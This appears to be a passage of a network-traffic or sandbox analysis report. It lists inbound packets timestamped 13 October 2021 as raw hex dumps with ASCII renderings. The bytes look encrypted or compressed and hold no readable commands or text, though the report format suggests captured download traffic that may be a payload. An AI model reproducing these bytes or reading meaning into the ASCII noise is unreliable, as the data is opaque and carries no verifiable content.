e9 6d 6f 56 df 11 f4 41 1a 18 ab 08 12 31 7f 0f 58 5b c6 ca 84 76 04 4c af c9 e3 85 d5 71 50 e5 52 5d 37 57 e2 f0 51 0a 95 c5 9d f1 a4 80 5c 14 43 36 5c fd Data Ascii: <1"23W>%49DG_z'^5aYg0'ldNll-Feh)#P'()WnHTs$a}JV+s;J C9CaeR+A!C$g);pi\|t,Y=]U8jPp;FTmoVA1X[vLqPR]7WQ\C6\
2021-10-13 13:52:05 UTC	581	IN	Data Raw: ca a1 b3 02 59 99 65 89 fa df c9 5e b1 53 df 75 71 48 4c 73 4d 61 44 08 55 b0 00 a5 c1 f0 04 5b a0 2c 7f 87 7e 36 f8 2c 00 78 b0 a2 c7 ed aa 39 f1 80 9e fd 70 27 b0 6a f5 23 a3 85 69 09 6e 4a 31 05 6c d7 0b bf 76 79 f9 77 78 50 e5 70 45 aa ab b2 30 b7 39 e3 89 2b 6d fe 67 09 1c 41 49 2e 09 52 76 7f 95 92 4c 91 4b 10 ba a3 44 17 f6 3d 2d 13 ad cc 22 27 7b 77 f3 fc 47 6c e5 3e 84 6c ef dd de 2f 09 31 22 68 1a 41 6b 39 40 af dc 3d a9 d2 01 ae ce f3 64 ce 77 ad 2c 6d 4e 4e 46 ef 6a 95 3d 4d d3 af 12 cb 42 49 a4 3c 97 78 c6 c5 56 be 42 a2 79 58 eb 71 a1 e5 b2 16 5d e5 24 c5 78 e2 71 b6 30 f1 86 74 51 0f 4f 81 0d a0 e5 6b 9d 7a f2 a1 f2 0b 16 89 23 f9 fd e3 0b 52 f4 b8 3e 21 01 b7 7e 6a ca bb 43 dd 6b f1 00 97 b9 fa ad d8 9d 1b b1 6b 89 29 d4 10 08 72 81 b5 06 Data Ascii: Ye^SuqHLsMaDU[,~6,x9p'j#inJ1lvywxPpE09+mgAI.RvLKD=-"'{wGl>l/1"hAk9@=dw,mNNFj=MBI<xVByXq]$xq0tQOkz#R>!~jCkk)r
2021-10-13 13:52:05 UTC	582	IN	Data Raw: c7 3e f0 2a 37 4a a4 73 91 d6 fb f4 c9 84 f2 8e 01 5a 57 cb 6b 14 92 18 59 a2 b7 3f 4e 35 18 3f 62 29 44 36 0f d2 86 7b 37 a0 d4 6b fb e8 ad 39 44 1f b4 be cd 2d a9 10 e5 0b a1 d8 7b 0a b8 fb b8 26 c7 3e 87 03 a1 82 f5 ee d7 99 c2 60 71 51 1d 6b d5 14 dd 3f cb 59 d7 5a a7 c3 f4 6f 87 1a 47 50 85 d7 87 a1 35 f8 2c d3 31 2d a4 80 13 55 6b 7c 5b cc e4 d2 1b 22 fd 8e 94 f6 0e 08 d2 3d c1 c6 ac d5 2c 63 0e 76 7a ba e3 0e 83 57 b4 6e 27 bb f7 3c dd 39 38 8a d3 69 48 35 84 cf 71 4f 65 f6 02 1d 55 3b f4 cf 60 80 36 18 28 a9 10 f6 68 28 13 ad f6 ba 37 40 8f 07 e3 29 75 e1 a7 9b c7 f8 f7 00 2f 5b 4d 8d 30 e7 be 17 fd ac 8d fa 29 ef e6 23 e0 8c 52 0c 6c 12 91 79 b6 64 9d 15 67 9d 3d 6b 4d 4c b4 12 cb 2b f6 79 e7 26 6f 88 3a 3c 35 56 68 96 00 45 d8 b6 e8 ec 00 f2 b3 Data Ascii: >*7JsZWkY?N5?b)D6{7k9D-{&>`qQk?YZoGP5,1-Uk\|["=,cvzWn'<98iH5qOeU;`6(h(7@)u/[M0)#Rlydg=kML+y&o:<5VhE
2021-10-13 13:52:05 UTC	583	IN	Data Raw: 38 b8 12 ba b0 20 bd 7c ab 39 59 72 4b d3 ea 2e 2a a6 88 cb b5 2a 4f 84 0b 3e 57 fc 9d 10 3d 19 20 2e 10 8e b5 c6 fe 12 7c fc 0c 15 3c ea 3e aa 4d 3a 06 dd 01 1d 7a 2a e0 5e 40 a4 f4 20 08 48 85 51 9e 46 f9 76 a4 5b f2 df a2 53 ae 87 7e 0c c6 16 07 8a cf 4f b9 f8 7c 34 bc 40 d0 26 7e ed cb 33 af 72 9e 67 e7 2a 6f 74 05 ce f8 85 c2 d3 1d cc f2 ec 91 7a 4e c8 22 f8 b1 8a 28 ae 16 0a 62 bd e2 ba e7 47 f7 6a 86 65 4e fc 29 11 99 58 19 58 3f f8 b5 91 f8 28 1c c2 3a 7c cd c7 06 36 23 d7 57 25 17 a2 43 48 68 a2 b9 d6 31 fc a4 ab 50 77 55 40 13 24 e7 cc 44 c7 ce 3d 5a 8e 2f a4 de 68 92 6e b0 cb 07 20 d8 36 46 40 1c 50 e5 b9 97 7d 8e 9b cc da e6 53 07 5b 66 7e da 41 55 65 0c f4 b0 cc 9d 5f 99 74 d7 16 20 76 24 63 5f e3 90 a2 f3 24 5b 10 59 a2 fc d9 4f 4d 6d 2c 5c Data Ascii: 8 \|9YrK.*O>W= .\|<>M:z^@ HQFv[S~O\|4@&~3rg*otzN"(bGjeN)XX?(:\|6#W%CHh1PwU@$D=Z/hn 6F@P}S[f~AUe_t v$c_$[YOMm,\
2021-10-13 13:52:05 UTC	584	IN	Data Raw: d3 f5 73 c0 98 25 b7 aa cc 10 fa e9 a2 e4 9c ba ee 11 8e c2 ce 25 0d 3d c0 c1 30 02 b4 0f 34 8a 7d e2 8e 61 fc 80 d7 56 8e 78 ca 1b f4 9f eb 33 63 35 0f 17 5e 0c b5 32 ad 4b 94 59 46 0b 7b c4 e8 c0 95 92 ad 64 84 25 9a 49 89 05 92 c9 b8 df 05 0a 9a b2 96 fb 1f 51 3b 68 ab c8 1e 09 80 b3 44 16 52 ff 1c 7b 2e 0a e2 47 d2 ed b0 20 13 39 f0 c0 44 4b 6f b1 1f 4c ba f2 3d 88 88 32 e2 ed 3d 31 52 2c 28 9a a9 01 72 c0 34 f7 71 de c7 96 a2 93 bd 71 28 aa 5e 54 17 cf a5 8b cf 38 c7 2e fd ad 40 a5 70 bd 3e 28 48 84 82 67 bc 5a ed 98 87 23 a9 c0 35 3c 93 33 db c7 5a 5c bf 53 09 ef 68 23 6f fe d6 1b ab eb 88 c8 d2 e7 24 b7 20 96 12 c1 b4 52 4a 92 55 09 d1 3c 39 fb 09 82 e5 27 13 18 23 89 66 1b 89 f3 48 c0 69 89 33 48 1e bc d2 44 f4 7a 25 3f 40 76 15 44 8a 16 6d b1 85 Data Ascii: s%%=04}aVx3c5^2KYF{d%IQ;hDR{.G 9DKoL=2=1R,(r4qq(^T8.@p>(HgZ#5<3Z\Sh#o$ RJU<9'#fHi3HDz%?@vDm
2021-10-13 13:52:05 UTC	586	IN	Data Raw: 4a 9d 07 16 e4 3a e3 6a 4c b5 ac 0c ad 5e 1a 90 50 aa 3b cb cc 23 29 68 ee 93 45 93 cf df fc 51 18 e9 24 da 7f ef 2f 74 84 7d 2d 87 cf 4e 7b 06 ad 5e cf 62 93 94 66 38 b2 e3 03 fa 9d 4e be 63 78 b6 2e 01 99 f7 8c f5 5e 46 7b d0 a7 b6 17 fc 81 fa eb 5c 61 ef b9 ec 7f da e4 01 05 e4 85 0f 4e 92 d3 b8 b3 89 a7 4d 2a e2 54 75 c9 2a 26 1a 41 1e 99 18 c1 a7 2c cf 2b a5 55 08 d4 b6 9c 0f 87 12 20 3f c4 94 a3 7b 7b e8 87 ed 50 40 e0 ec aa b4 a4 32 47 f0 89 46 72 15 14 ff e6 0d 45 0f 68 7a d5 03 09 49 52 44 89 85 68 cf a0 1a af c2 c6 6e 24 7a a8 98 d5 48 20 3c 51 a0 e9 96 4a a9 3c 1f e5 a9 0a 44 d9 a2 27 fc bb 11 19 54 92 55 41 84 12 f6 f0 b6 ad bc 32 6a 42 97 f6 15 39 b9 2e 6c 8c 7d 66 78 82 f6 00 02 1a 2b e9 ab 13 21 1f b4 10 73 df a9 19 ed 72 ad ed 8e 77 8c a2 Data Ascii: J:jL^P;#)hEQ$/t}-N{^bf8Ncx.^F{\aNMTu&A,+U ?{{P@2GFrEhzIRDhn$zH <QJ<D'TUA2jB9.l}fx+!srw
2021-10-13 13:52:05 UTC	587	IN	Data Raw: 9b 2e 34 6f c1 bf 35 15 25 01 95 b9 ff 1a 89 9a 93 f2 7b 7f 7f be be 96 d5 9f a4 3b c7 42 b0 fa 7b e1 69 9b 35 dc dd 12 6b 02 f2 b1 8d 38 61 e9 fc ed 72 55 ba f4 67 bd 85 0b d6 30 df 6d 6f 85 dd 40 7b 1f 65 5c 43 54 12 27 f4 2d 40 74 f8 94 de b6 98 82 ba fa 20 e7 ca 4d 0e e0 e4 98 fd d6 30 69 38 4d d4 c0 36 85 b7 71 b0 56 10 a7 52 50 8b 10 8b 93 40 11 7b a5 1a 4b 71 76 e9 ee 96 21 a0 62 60 43 41 41 ee a2 ca 26 62 84 10 8e 8c 21 e8 a4 cc f2 cf 91 7a 6b c8 22 d5 b0 8a 0d cf 90 5e eb f8 bb 4e b6 12 ba 27 67 f8 c8 3d 55 98 dc ba 1d 50 21 20 9a 7b 1b 6d 98 4b f6 d3 b0 e8 f0 36 3b d5 b8 f1 ae d7 4c dd 87 a0 c9 7c 3e 42 2e fa 64 77 5d 50 fc d0 86 33 ec 28 ba 80 9c a1 fd d1 f4 2a bf 8c 3b 86 17 fa 00 ab 14 ef b4 fe e1 8d f6 a0 84 67 33 a6 ca 68 46 4f ed 00 e6 a2 Data Ascii: .4o5%{;B{i5k8arUg0mo@{e\CT'-@t M0i8M6qVRP@{Kqv!b`CAA&b!zk"^N'g=UP! {mK6;L\|>B.dw]P3(*;g3hFO
2021-10-13 13:52:05 UTC	588	IN	Data Raw: cc b2 4f 36 6d 63 8f 7c cd 85 a8 2e 0e 5f 8b 32 65 08 c2 e6 28 4d e5 ed 34 10 da 1c 34 e5 91 77 96 db a0 0f 57 ec a7 e9 70 a1 b8 f1 e9 a2 3e 49 5a 35 1d 8e 6e 1d 09 86 2c 4d 69 47 bb 63 d3 f4 e7 d4 91 e4 96 57 80 fb 8d 34 54 ca 27 33 6e 68 b7 bb 8f 82 73 7a 5c c8 f2 fd 3a 26 5a 07 f4 2f 7f c7 27 93 4a 11 ca 28 8b 45 8c a2 28 ee f2 fe 0d 93 ed ff c3 69 04 9c 1e 76 1f 6d 72 bf de d7 9f 38 2d 06 2d 1b 4a 53 f4 c9 31 94 2f e5 57 0c 3a 2e 6e 2f 7f 5c 20 bb 15 d4 e1 ca 9f 1a 22 7a ec 87 ef d3 fb c9 ce 77 df 62 ca 00 8c 3a e6 ad c2 c3 ac 07 84 35 db 58 00 d4 5a 58 8b 20 f4 b6 d1 d0 d1 7b 6d ce 23 3e 5c 52 dd a5 09 65 81 28 8b f2 91 a6 c2 03 3e 43 87 75 6b f4 39 0c fa f7 10 a4 b1 88 42 ee 9e 26 2d 26 60 c5 c8 18 cd 1f eb 29 1a 32 1f bc 19 65 ac 05 07 15 87 32 6e Data Ascii: O6mc\|._2e(M44wWp>IZ5n,MiGcW4T'3nhsz\:&Z/'J(E(ivmr8--JS1/W:.n/\ "zwb:5XZX {m#>\Re(>Cuk9B&-&`)2e2n
2021-10-13 13:52:05 UTC	589	IN	Data Raw: 1f 7d 03 1f ce da f1 1a 8e 0a 8e aa 89 29 ab e7 c8 f0 6d d5 55 a5 99 74 d7 15 10 17 77 6d 5d e3 e2 cf 83 73 a4 ef 82 3f 3e 20 4a 27 f2 65 1d 71 43 e5 a5 b9 42 f7 fc d5 fb e9 2d 09 2e b9 75 83 60 c1 8d 79 2d 82 10 5d aa 4c 14 ae 85 cf 32 ef ea ed 23 d7 c2 f9 94 81 78 c7 3c 93 f8 c0 b1 ef b6 54 f6 07 c1 c9 10 c9 67 0f 46 63 44 a1 b6 17 ff 3f 98 b1 b4 5c 48 2d a9 18 f9 98 3a aa a5 5a 52 22 f9 4c b8 b3 87 25 29 03 87 c1 37 99 79 4d 2c c2 1d 59 c3 b4 a1 04 3c 51 a5 76 11 b1 46 de 5e 6f af 3f 7a 28 e2 09 44 75 50 84 bf ea aa 97 3e 39 39 f1 5d d1 14 eb e4 72 95 a8 3b 82 29 d2 b7 f4 ac 39 53 07 00 ba 82 76 7e 39 27 5d af f8 2a 44 39 20 f7 6c 56 bf 3f d4 c3 03 1f 37 e1 69 39 b1 9a 8a 96 e5 ed 61 de c9 12 f2 bd b0 5e d0 c1 15 da 99 fb 40 fa 7e 27 f8 b3 7c 67 18 b2 Data Ascii: })mUtwm]s?> J'eqCB-.u`y-]L2#x<TgFcD?\H-:ZR"L%)7yM,Y<QvF^o?z(DuP>99]r;)9Sv~9']*D9 lV?7i9a^@~'\|g
2021-10-13 13:52:05 UTC	591	IN	Data Raw: 60 73 31 03 a8 47 bd 80 54 73 51 00 fc 6a e1 e8 13 1b d0 41 88 11 81 f3 48 c6 b6 f4 0b 2a e1 43 d7 6b c9 e4 d7 c0 34 bb 11 74 8a 70 e7 fc 90 4a 9e 1c 32 0f 3b f4 a5 ff 4c 85 ce 1c 67 bf 47 12 77 2e ba 6c 5b 7f 8e 35 d0 0d fb 6f b2 4d 30 e8 11 ac 68 ba 09 33 72 e2 f2 7d 5b b5 12 03 f8 90 6c 19 3e 24 cc 90 ad 12 df 5a 64 15 c8 90 e2 4f 98 12 a7 46 c9 50 23 b0 84 d5 b6 5e 78 50 29 f1 9f b3 8d da 8c 14 12 b4 0d 8b cb 09 9e 4c 73 f0 24 87 23 c0 95 3c 12 b8 74 f0 1e d6 e2 21 67 bf a2 23 2b 37 91 7d 14 77 e6 19 af ae 06 89 20 54 23 e8 77 ce 8c a7 96 3b 86 41 67 3d c0 a5 e2 aa 16 7c bb a9 d8 b6 2d 91 7e a2 09 bb 95 51 fb 16 dc ba 93 dd d8 f7 f8 71 71 6d 79 cd 7b 84 44 82 9a bf 31 7d d9 c9 dd 5c 11 92 05 4f c9 29 ce 44 fb ff 3c fe 18 ca 75 20 3f 1c e8 3b f1 d4 e2 Data Ascii: `s1GTsQjAH*Ck4tpJ2;LgGw.l[5oM0h3r}[l>$ZdOFP#^xP)Ls$#<t!g#+7}w T#w;Ag=\|-~Qqqmy{D1}\O)D<u ?;
2021-10-13 13:52:05 UTC	592	IN	Data Raw: 76 6e 55 c1 bc 1f 7e 4d 7b 24 26 b1 04 16 84 41 e6 3a 07 60 d2 ad 41 43 62 68 70 41 bb ab cd 8e 75 c1 8f a8 5c 6d 8a 4f cd 10 d2 fb f0 a1 86 6c 8d 19 1d c6 6b d1 5b 98 6d c3 41 fd c0 e9 00 9d 77 b1 78 b6 78 be 13 2c 93 a4 36 fc 04 62 7f 30 b3 4a cc 96 6d be 32 fd 05 c4 5b ea b3 dd 4b 2a a9 9a 45 68 7d c1 f0 c7 05 df cb 84 12 68 ee b6 6b e7 60 12 42 28 f1 e9 1e 74 f9 e3 7b 99 29 f7 1a 68 24 bd 29 9c e8 bf 3b f5 fb 1c 53 f9 6d 65 d9 48 05 d1 a1 27 6f 06 9c 95 ae 6e ac c9 6c 73 7b 1e 32 74 52 51 1c d1 af 0a 76 cd e6 99 6c 59 19 39 5a c7 92 90 00 8e bb 38 d6 2a 9e e9 a0 2d 78 2c 1f 7a 2d 54 bf 9a 94 75 61 be 51 82 10 21 38 3f 18 d6 a7 f0 87 d8 5a d3 9c cf a5 25 cf 38 c7 66 ff ad 40 a5 22 9e 3e 28 13 50 ea 19 ee 5a ed 98 82 23 a9 a3 81 e6 56 15 ac ad e5 4f 66 Data Ascii: vnU~M{$&A:`ACbhpAu\mOlk[mAwxx,6b0Jm2[KEh}hk`B(t{)h$);SmeH'onls{2tRQvlY9Z8-x,z-TuaQ!8?Z%8f@">(PZ#VOf
2021-10-13 13:52:05 UTC	593	IN	Data Raw: 11 b5 fe 18 2d 38 5d 23 41 ec e8 63 3d f9 ac 2f a4 66 2f fe 9a b0 cb 6d 71 d8 e6 94 ec b2 47 4c 5a 1e f0 03 32 e3 77 e5 30 2e a3 62 38 4a a2 e5 74 87 81 e8 cc 55 2d 34 e1 20 2d 46 ae 2c b5 be 4e 87 e2 78 8e 5b 9d 97 27 a4 3e 07 f7 20 49 52 7a bb f3 21 bd 4c 02 03 2a c2 be 93 95 af 66 70 eb bf cd 01 3c f4 32 3f f3 10 81 15 d6 78 b3 09 93 01 3c b7 51 ca 99 94 eb 33 c1 54 b6 c6 bc b6 b9 95 97 2d 7b d1 9e f1 b4 05 85 4c f2 36 5c 49 82 ad 3b 43 a1 d9 e4 62 2d 22 dd 31 4a 16 8a a4 81 5d 25 bf 5c bb 73 03 5d 55 77 0a 84 88 97 a1 40 83 92 b9 e2 35 94 f6 26 26 c1 3d 91 44 69 80 d2 8e 6b 1f ac 7a 28 5c 9c b7 2a a5 c6 5a 31 b8 95 65 ef d7 78 9b e7 7e a4 a1 84 9c d2 99 7f 4b 23 d6 a0 95 5f da c1 6a 37 fa fa f3 7c b7 a7 fd 3b 4b 00 14 a9 b2 fe bb b0 f6 19 a5 8a 0d b3 Data Ascii: -8]#Ac=/f/mqGLZ2w0.b8JtU-4 -F,Nx['> IRz!Lfp<2?x<Q3T-{L6\I;Cb-"1J]%\s]Uw@5&&=Dikz(\Z1ex~K#_j7\|;K
2021-10-13 13:52:05 UTC	594	IN	Data Raw: a7 79 dc db dd c3 df 0d 22 cd c0 2d b4 99 7d 54 e7 d6 b6 95 96 0b e5 3a 7b 9e 1f 5a 49 1c b9 18 eb 29 22 3c ad 4f 16 e7 81 54 f8 44 bf 72 61 e1 82 13 17 94 87 0f 19 8b 9b b7 49 b4 3d 4f ba 8b 43 d7 d5 99 64 cd c0 bf 5d 54 9d 30 50 8e 3c fb cc c1 40 bb 4a a5 1c d3 a3 9c d5 f7 b5 8a 95 67 78 fa 11 6a b8 c9 b6 99 2d aa 6b e2 6f b1 e5 5c 0d 12 59 84 b2 69 33 25 39 3e c0 ef d6 82 0e 92 90 85 dd 04 4c b6 b6 a8 b3 3e 12 16 7f 9f 4b 3e e2 12 05 c9 da 09 5f cf b9 39 cc 12 bf 35 c6 a2 9f 42 6b c0 bd 25 bc 08 63 0e 33 14 a2 b1 4f 9b d9 4f 87 74 1d 4d 6d c5 97 3c 03 1d 17 d9 7e ae 98 90 0c 27 d8 43 25 cc ee a2 f9 47 a1 4a 99 cb d4 6c fd 13 6a 08 ac 3d 55 8c 2b 67 69 6e 44 3a cf 22 dd eb f8 03 c5 21 55 6a 14 82 0c 43 b4 f6 98 dc 83 e5 e9 d6 f5 f4 7a 71 6d cb 3e 8f 81 Data Ascii: y"-}T:{ZI)"<OTDraI=OCd]T0P<@Jgxj-ko\Yi3%9>L>K>_95Bk%c3OOtMm<~'C%GJlj=U+ginD:"!UjCzqm>
2021-10-13 13:52:05 UTC	596	IN	Data Raw: 4a 00 0d a9 b2 f0 54 7c 63 56 86 d7 c1 22 d1 c3 ec 6d 13 4c b4 7c fe 63 7d 8a 03 84 ab 14 b1 df 04 e8 53 dc a9 24 30 c0 ae 3e b5 16 b1 06 cc e7 74 ca 5c 8e 45 8e 49 80 c6 b0 e5 54 55 eb 3b 13 98 dc 64 17 07 d7 69 03 8b f1 1a a8 07 f4 a1 a0 49 0b df ea c2 ac e0 a9 12 12 cb 41 4e b1 8a 72 91 7d c5 91 70 af fe 13 39 bb e0 0c 44 77 16 2e b3 0b 17 7c 95 71 52 4d 26 40 04 3f 69 a8 fd c2 0b b5 96 06 14 7b 9e ae 97 05 a8 cb 84 c2 60 0f e1 a8 b8 54 25 0f 26 b2 dd ac e5 88 bb 13 f7 be 95 17 4f ad b2 18 8c 55 66 73 8b e8 5f 99 d9 ee 48 ee 8c 26 d2 f1 32 95 8f 9b 18 76 6b b4 5e b3 e6 28 1f 36 a2 1e ff 0b dc 5e 8f 22 bf 4c ee b7 8b a9 6e d8 38 1b 42 b4 d3 3d c7 5f 24 0e 95 9b f2 f2 5f 90 e2 59 e6 ce 75 fc 07 db e9 88 56 94 b4 b9 c0 91 d0 13 03 fd e7 a7 4a 63 65 56 51 Data Ascii: JT\|cV"mL\|c}S$0>t\EITU;diIANr}p9Dw.\|qRM&@?i{`T%&OUfs_H&2vk^(6^"Ln8B=_$_YuVJceVQ
2021-10-13 13:52:05 UTC	597	IN	Data Raw: dc ba 13 d9 dd fc 7c 3e cf 96 0d b4 2e d8 ac d1 80 40 99 a0 a4 70 a9 a3 ee 97 05 e7 31 29 ce 44 95 93 2f fc 1a a0 f8 28 ae 37 46 c7 61 58 29 d8 7e f2 05 3e 7f 6f 4f 48 c3 55 d0 63 30 82 8b f9 b5 df 1e 7d 1b b3 ca da f1 22 fb b3 20 b5 e5 d6 28 a0 00 71 20 4e 94 7c 65 8b 28 cc 0b 03 f6 6e 27 c8 96 b5 04 de 0a 9d 47 0b 0f 4c b5 75 27 1a 08 f2 bb f3 42 36 b4 f7 fc a9 6c aa 93 7c 02 7a db fc f9 20 8f 3c 79 7f b8 4a e0 b3 91 d6 12 31 a7 af 55 aa 5e 1a ad 6c 6b 66 e8 96 4a 14 fa 6f a6 7f 94 bc a6 45 d8 cb 78 c9 80 83 17 0d c3 a3 18 65 f8 95 41 1f d7 99 8a 34 2c 6c de 98 3a aa a5 41 29 e4 fe 97 cd ae 6a 8c 5f 7d 0a 09 52 1d d3 5a 21 01 4b b1 f4 bb dd 3f b7 10 56 87 98 33 8f 29 0e 87 9f 27 2f d4 38 d1 09 2c d5 7c 43 e9 af f2 69 76 c2 0e 21 45 4e 96 e5 72 15 97 d3 Data Ascii: \|>.@p1)D/(7FaX)~>oOHUc0}" (q N\|e(n'GLu'B6l\|z <yJ1U^lkfJoExeA4,l:A)j_}RZ!K?V3)'/8,\|Civ!ENr
2021-10-13 13:52:05 UTC	598	IN	Data Raw: 45 33 ac 3e 10 6e 8a ac ff bb 71 ee 6f e3 9a 6f 2f d0 5d d3 de ed 41 40 30 67 5e d8 b2 d9 b9 35 d6 b9 4e e2 27 39 c6 bc 71 75 eb 4a 67 fe 2f 5c 30 38 3a 33 94 55 ff 64 24 a4 a9 86 2b 7e da b7 97 f4 c3 bc 09 0f 8c 90 16 75 55 56 2f 28 2e eb 2d df 29 ce cf 6d 70 7b 16 93 b4 cc 26 3f c4 ba e8 32 03 36 a9 6a 50 bd f0 12 78 31 cb 07 7e e2 e6 98 37 ae 57 34 19 1c 7d 9a 57 b0 e1 02 4b f9 a2 62 3f c8 a2 f6 68 4b cf 9d 99 62 64 e9 ce dc 17 ae ef 20 e3 a2 97 22 42 91 8c 0a 9b 2a 3f 77 33 4a 27 f2 65 05 c1 4d 7a ef df cd f7 77 1b 25 1a 3a c0 7f 34 20 88 53 bc 67 b7 7d 0d 89 63 10 cd 9e 61 b0 bd 98 b3 50 71 f3 33 4b de 98 60 20 42 e1 ba ed 41 cf be e0 fa 25 e9 cd f2 8d bb db 85 9e fe 56 5e 1b 00 96 e9 13 49 df a5 6a 1e 5f 1a 64 eb 7b 79 54 af d6 e3 8f 2a 33 bf 72 60 Data Ascii: E3>nqoo/]A@0g^5N'9quJg/\08:3Ud$+~uUV/(.-)mp{&?26jPx1~7W4}WKb?hKbd "B?w3J'eMzw%:4 Sg}caPq3K` BA%V^Ij_d{yT3r`
2021-10-13 13:52:05 UTC	599	IN	Data Raw: 6e ab 80 c2 de 78 1c 53 bb 4d ae e3 a5 29 de 71 b9 e9 8e 52 8c 41 c6 26 fc 3b 4e 6f b1 c1 31 00 a0 67 d6 01 59 14 f4 b8 d5 11 1f ce 0e 7b df 15 ad 5b eb 70 88 4c b5 99 04 5c 72 74 ac d4 06 80 30 5a da a8 db 52 44 02 38 bf 27 41 95 73 d4 2a 00 2f 5c 16 d7 68 da 79 1b 13 64 53 b5 06 73 e2 7d 59 4b 66 09 f6 07 c8 a8 05 c4 05 52 06 a8 b6 4e 39 3d f4 60 b6 80 be 6e b9 52 c3 56 3b df 67 38 99 8f 13 37 22 09 05 72 50 2a 0e 73 8a 7e 0d 65 b4 97 60 46 8b 43 ea 83 1b 6a 5a 8d 47 64 47 2e dc 98 43 77 91 cc 1d 19 63 59 b9 ea 78 ba 9c 5e ca 08 3b 79 af 06 aa 7b 6a 64 da c7 5f 19 7e dc a5 e4 54 d0 70 b4 eb 9f 3c 58 a5 a5 be 3a 3c 69 8a d2 5b 15 92 90 50 4e d9 a1 b9 20 a2 bc 3c 1a 7e 7f c8 4d 5f 63 a3 ed 76 48 5c 4f 2c 9e 89 5e b1 5e 40 a4 c8 c1 7c ea 87 51 cd 9d 9c 97 Data Ascii: nxSM)qRA&;No1gY{[pL\rt0ZRD8'As/\hydSs}YKfRN9=`nRV;g87"rPs~e`FCjZGdG.CwcYx^;y{jd_~Tp<X:<i[PN <~M_cvH\O,^^@\|Q
2021-10-13 13:52:05 UTC	600	IN	Data Raw: aa 66 f6 d7 77 69 31 e5 7b 4c 3b 77 16 5f 9d 72 8e a9 d5 c9 2a 96 1e dc 48 85 8f 09 e6 d8 34 d4 5a 8b 1d f4 82 6b c3 40 da 7c 3a 28 6f 5c 0d bd f8 0a f9 60 7e 81 ff df 24 7c 9b d1 48 7a 0c 31 5e 97 3b c5 c7 06 9b ed ba f9 5c 1d 05 35 7e 28 21 66 ac cb e5 6c 49 10 5a ab ba c4 8d 69 e1 54 96 f7 19 35 61 ca a9 b1 9a 59 df b0 5f d9 79 82 29 5c bd 6b 82 aa 13 49 32 90 59 ad 75 f5 ff f0 32 90 68 14 e2 d1 56 c2 3a 34 c1 e9 eb 31 b0 d1 67 96 ed e9 fd 44 42 10 d5 6c 74 a3 62 8d 2b f0 93 ed 78 87 f0 d6 b0 4e 64 75 b6 c8 26 9f 02 1d 4f 1b 88 f4 6a fc 6f 78 ca d2 52 06 ae 13 db 45 2c 46 6c 5a 17 5d b3 4f ac c0 ed f5 68 4c e1 05 33 b3 7d c3 79 07 5f b9 1f 06 e2 6a 91 2a 3c 05 df cb 07 b7 ff 04 6f 92 b9 3e 21 01 8d 68 03 c7 86 04 b7 6b 25 a8 65 6e cb 85 d9 1e df 3e ca Data Ascii: fwi1{L;w_rH4Zk@\|:(o\`~$\|Hz1^;\5~(!flIZiT5aY_y)\kI2Yu2hV:41gDBltb+xNdu&OjoxRE,FlZ]OhL3}y_j<o>!hk%en>
2021-10-13 13:52:05 UTC	602	IN	Data Raw: a6 85 b8 e1 46 99 fc 71 f0 51 cd 93 d5 6b 8b 9b 87 5a 39 18 7a 3c 78 44 75 c6 91 cc 7b 7c f7 f2 57 4c 4e 53 b5 de c3 36 aa 3f 9f 8c 65 98 b6 f1 15 41 53 99 40 12 a0 20 ee 99 49 d3 e7 6d dc a9 cd 64 c7 30 69 6a bb 95 60 08 d8 fc f4 91 7e ac 98 1f 4e fc 0f 1d 2a b5 14 91 d9 71 f0 f6 2d 72 f3 18 97 39 26 82 f0 3c a2 29 b2 54 53 53 97 dd ec a0 44 a9 f5 ec 62 7e 39 ff 18 a0 fe e8 7a 41 ec d8 63 96 37 74 c7 e7 8f a1 fa 1b fd 2b 84 b5 59 2a 09 b0 66 66 c3 8e 95 b6 b2 dd 7e 7f 0e 70 cb 62 70 38 5e a8 97 54 5c b1 e0 41 65 e6 ef df 18 3b cf aa 5d 66 70 68 5f c1 87 be 23 9b 86 e0 d0 38 0e 10 51 a2 f7 f1 6d 7a ff cf c3 5f 1f a1 71 bd d8 c3 a9 f5 cb 13 8f 0d ed b5 2c 8f 6a 79 8c ac a2 0d 41 6f d5 c8 0e cf 76 89 9d c8 1f 0e 30 89 3a ae e9 b4 4a 26 6b f1 aa 2e 07 99 2b Data Ascii: FqQkZ9z<xDu{\|WLNS6?eAS@ Imd0ij`~Nq-r9&<)TSSDb~9zAc7t+Yff~pbp8^T\Ae;]fph_#8Qmz_q,jyAov0:J&k.+
2021-10-13 13:52:05 UTC	603	IN	Data Raw: 6f b3 3a f4 be 52 3a 4f ad 5b 19 db 3e f0 db f7 11 d9 02 a7 e6 d3 b7 4b de aa 82 cf 90 07 eb 8b a8 b6 fe bf d6 98 a3 02 ab bb 89 fb ef 7e 77 dd ca b3 e7 99 1a 5f 85 d6 fa 66 90 f0 01 b2 78 cb 2a 84 75 63 47 59 f7 22 36 95 59 d6 22 92 a8 82 9f ca df 04 39 d2 ad c1 c3 03 3f d8 22 27 d3 a9 ef b3 9e d6 2a b7 40 71 5c d9 5a 10 8d 24 33 5d 65 dd a5 01 65 82 7c 51 3c cc 07 1b 1e b9 54 23 74 d0 c5 4a 66 09 8a 2b 4b bc 5b 4f 63 cb e5 11 79 42 21 3d a6 2a 63 68 eb 61 e7 d9 a5 cf f0 0d 04 08 47 fe f5 1d ff 09 56 00 9b 0d 1a 92 de e3 18 1a a1 10 74 e8 b1 ab 7a 7e 8e 95 54 04 af 6a 4b f5 6f 2d 27 00 85 b9 88 9d 7f 17 da a1 3c 31 d9 c5 ce 7f 24 23 15 42 ab 93 52 11 60 c0 5f 19 52 dc a5 e4 54 d0 70 10 00 d8 f0 39 56 2b f9 2a a3 0e 46 2e 05 9c c7 9c 56 48 06 cc a7 20 a2 Data Ascii: o:R:O[>K~w_fxucGY"6Y"9?"'@q\Z$3]ee\|Q<T#tJf+K[OcyB!=chaGVtz~TjKo-'<1$#BR`_RTp9V+F.VH
